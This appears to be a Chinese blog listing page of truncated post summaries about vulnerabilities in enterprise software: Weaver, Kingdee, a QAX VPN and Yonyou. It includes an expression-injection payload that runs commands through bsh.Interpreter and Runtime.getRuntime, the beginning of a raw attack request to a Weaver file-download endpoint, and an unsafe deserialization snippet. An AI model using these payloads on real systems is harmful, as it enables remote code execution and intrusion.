摘要:
已有详情 阅读全文
摘要:
执行指定类的构造方法,参数可控 阅读全文
摘要:
${param.getClass().forName(param.bsh).newInstance().eval(param.cmd)} bsh=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime 阅读全文
摘要:
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 Host: xxxxx Content-Length: 49 Accept-Language: zh-CN,zh;q=0.8 Accept: */* User-Agent: Mozilla 阅读全文
摘要:
/Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc 阅读全文
摘要:
QAX那个是老版本vpn信息泄露与密码重置 阅读全文
摘要:
可以看到,直接反序列化 ObjectInputStream ois = new ObjectInputStream(req.getInputStream()); Map<String, String> params = (Map)ois.readObject(); 阅读全文
摘要:
![image](https://img2023.cnblogs.com/blog/2228380/202305/2228380-20230519094018044-1519941697.png) https://security.yonyou.com/#/patchInfo?foreignKey= 阅读全文